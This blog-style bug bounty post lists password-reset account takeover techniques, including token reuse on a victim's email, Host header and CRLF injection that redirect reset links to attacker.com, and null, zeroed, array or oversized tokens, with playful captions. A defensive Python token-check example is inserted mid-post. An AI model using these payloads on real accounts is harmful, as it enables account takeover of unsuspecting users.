100 Days of Cybersecurity - Day 4
Hey, hacking enthusiasts! Ready to uncover some mind-blowing tricks? Dive into these HubSpot Full Account Takeover methods and master the hacker's playbook!
Using Your Token on Victims' Email
POST /reset
email=victim@gmail.com&token=$YOUR-TOKEN$
Imagine slipping into someone's email fortress with a cleverly placed token.
Host Header Injection
POST /reset
Host: attacker.com
email=victim@gmail.com
Messing with the host header to sow confusion. Crafty, right?
HTML Injection in Host Header
POST /reset
Host: attacker">.com
email=victim@gmail.com
Why settle for ordinary when you can inject style into your hacks?
Leakage of Password Reset Token in Referer Header
Referer: https://website.com/reset?token=1234
Spotting hidden treasures in the Referer header - a classic move in the hacker's handbook.
Using Company Emails
While inviting users into your account/organization, you can also try inviting company emails and adding a new field "password": "example123" or "pass": "example123" to the request; you may end up setting a user's password. Company emails can be found among the members of the target's GitHub repos, or you can check http://hunter.io. Some applications have a feature to set a password for invited emails, so here we can try adding a pass parameter. If successful, we can use those credentials to log in to the account, SSO integrations, support panels, etc.
Mixing business with pleasure by exploiting the power of company emails.
CRLF in URL
/resetPassword?%0a%0dHost:attacker.tld
Breaking into the reset realm with CRLF magic.
HTML Injection in Email
HTML injection in email via parameters, cookies, etc. > inject an image > leak the token
Crafting emails that are not just messages but gateways to breach security.
Remove Token
/reset?email=victims@gmail.com&token=
Playing hide and seek with tokens - remove, replace, and conquer.
Change it to 0000
/reset?email=victims@gmail.com&token=0000000000
Transforming tokens like a digital alchemist.
Use Null Value
/reset?email=victims@gmail.com&token=Null/nil
Because sometimes, nothing is more powerful than Null.
Try an Array of Old Tokens
/reset?email=victims@gmail.com&token=[oldtoken1,oldtoken2]
Rolling the dice with a repertoire of old tokens.
SQLi Bypass
Try SQLi bypasses and wildcards: or, %, *
In the quest for knowledge, SQLi becomes the secret language.
Request Method / Content Type
Change the request method (GET, PUT, POST, etc.) and/or the content type (XML <> JSON)
Mastering the art of disguise - because not all requests are created equal.
Response Manipulation
Intercept a bad (failure) response and replace it with a good (success) one
Turning the tables by manipulating responses. It's like playing chess with code.
Massive Token
/reset?email=victims@gmail.com&token=<string of 1000000 characters>
Unleashing the power of the colossal token - because size does matter in the hacking world.
Crossdomain Token Usage
If a program has multiple domains using the same underlying reset mechanism...
Navigating through domains like a digital acrobat - because sometimes, tokens transcend boundaries.
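The token tricks above (someone else's token on the victim's email, empty/zeroed/null/array/oversized tokens, Host-header-controlled reset links) all come down to how the server issues, stores and checks reset tokens. As an added example that is not part of the original post and not HubSpot's code, here is a reset-token handler written to fail closed on every one of those cases; the in-memory store, the TTL and the RESET_BASE_URL value are assumptions for the demo.

```python
import hashlib
import hmac
import secrets

TOKEN_TTL_SECONDS = 15 * 60                         # assumed: short-lived tokens
MAX_TOKEN_LENGTH = 128                              # anything longer is rejected outright
RESET_BASE_URL = "https://example.invalid/reset"    # assumed: configured, never read from Host


def _hash(token: str) -> str:
    # Only the hash is stored, so a leaked store (or a leaked response body) does not leak usable tokens.
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def issue_reset(store: dict, email: str, now: float) -> str:
    """Create a random single-use token bound to one normalized email address."""
    token = secrets.token_urlsafe(32)
    store[_hash(token)] = (email.strip().lower(), now + TOKEN_TTL_SECONDS)
    return token


def build_reset_link(token: str) -> str:
    """Build the emailed link from a configured base URL, so Host header or CRLF tricks cannot redirect it."""
    return f"{RESET_BASE_URL}?token={token}"


def verify_reset(store: dict, email, token, now: float) -> bool:
    """True only for a well-formed, unexpired token bound to this email; the token is consumed on success."""
    if not isinstance(email, str) or not isinstance(token, str):
        return False                                # arrays, null, numbers never match
    if not token or len(token) > MAX_TOKEN_LENGTH:
        return False                                # empty, "0000...", massive strings fail fast
    key = _hash(token)
    record = store.get(key)
    if record is None:
        return False                                # unknown, guessed, or already-used token
    bound_email, expiry = record
    if now > expiry:
        del store[key]
        return False
    # Constant-time comparison of the bound email against the submitted one:
    # an attacker's own valid token cannot be replayed against a victim's address.
    if not hmac.compare_digest(bound_email.encode(), email.strip().lower().encode()):
        return False
    del store[key]                                  # single use
    return True
```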
Final Notes
Leaking Reset Token in Response Body
Change 1 Char at the Beginning/End to See if the Token is Evaluated
Use Unicode Char Jutsu to Spoof Email Address
Look for Race Conditions
Try to Register the Same Mail with Different TLD (.eu, .net, etc.)
Hope you enjoy this adventure into the world of bug bounty hunting! Happy hacking!